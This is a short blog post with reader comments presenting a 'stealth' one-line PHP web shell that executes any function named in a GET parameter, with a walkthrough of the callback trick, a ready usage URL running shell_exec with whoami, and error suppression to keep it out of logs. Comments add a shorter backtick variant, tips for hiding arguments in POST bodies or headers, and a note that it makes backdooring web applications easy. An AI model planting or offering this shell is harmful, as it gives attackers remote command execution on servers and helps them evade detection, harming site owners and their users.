Tiny PHP Shell
Have you ever needed a small shell written in PHP?
Of course you have. But I bet it haven't been all too stealth!
This is really pointless, but someone might be interested in it.
So here you go folks!
<?=($_=@$_GET[2]).@$_($_GET[1])?>
It doesn't look like much so let me explain.
PHP allows strings to be interpreted as function calls.
That's a major part on how callbacks in PHP work.
Example:
<?
$array = array(1,2,3);
array_walk($array, 'f');
function f($x){echo $x * 2;}
?>
What the following example does, is that array_walk() iterates through the array $array and applies the function f() on each and every element in the list.
The function f() prints out the value from the array and multiplies it by two.
The output results in: 246.
The fun thing is, if you look on how the callback f() is applied - it's by a simple string. (Look at argument #2 in the first function; array_walk()).
What does that mean?
Well, to put it short, you're able to take a string - and execute it as a function name.
Now, let's try something... fuzzier...
<?
$fuzz = 'phpinfo';
$fuzz();
?>
What might this do?
Will it execute?
Damn right.
Now let's tear my tiny code apart.
It's made out of two parts.
- $_=@$_GET[2]
- @$_($_GET[1])
The first part takes the value from the GET-variable 2 and stores it in the temporary variable $_.
The second part takes our temporary variable $_, and executes it with the GET-variable 1 as it's one-and-only argument.
The @'s are only there for suppressing notices, warnings and/or fatals from showing up in logs, to the user or whatever else that might catch them.
Conclusion: Copy and paste the snippet, and store it in a PHP-file.
Execute a shell by going to: copypaste.php?1=shell_exec&2=whoami
The response should be something like:
apache
...or as on Windows if you're running your server as a service:
nt authority/system.
Conclusion; PHP is fun!
Ciao!
27 Comments
-
-
-
-
-
Chob1X says:
Great shell!
But could be smaller like ""
And more "quiet" in logs by sending args in a POST query, or in the HTTP Headers!
Great job!
-
Fredrik Nordberg Almroth says:
Haha yeah, totally. But then again! It would be bigger
A byte is a byte! Just learnt some nifty stuff about variable dereferences from the IRC, and Mathias managed to get it a few bytes shorter too. We might just write another post! -
-
Gareth Heyes says:
Cool shell but how about non-alphanum as well?
http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/ -
-
-
-
-
-
Fredrik Nordberg Almroth says:
It works just fine on MS Windows as well! However, if the GET-variable 1 is not specified, you'll get a notice; I solved it using a @.
My solution: < ?=@`$_GET[1]`?>Nice one tough, I didn't think of the backticks at all.
-
-
-
-
-
-
-
-
-
-
-
-
Sandeepl337 says:
Gr8 idea , using non alphanumeric we can make a backdoored webapplication easily
... -
Hey, I'm Fredrik. I'm from Sweden, born 1990, and I got a huge interest for information technology and information security. So far, I've been studying for three years at the Internation IT College of Sweden and one year at the Royal Institute of Technology (Kista, Sweden). I'm one of the Co-Founders of Detectify. I'm working closely together with the swedish firm Young & Skilled. ...Not to forget, I'm the previous founder of Arctic Security. If you wish to contact me, please email me at h@ackack.net or follow me on twitter @Almroot.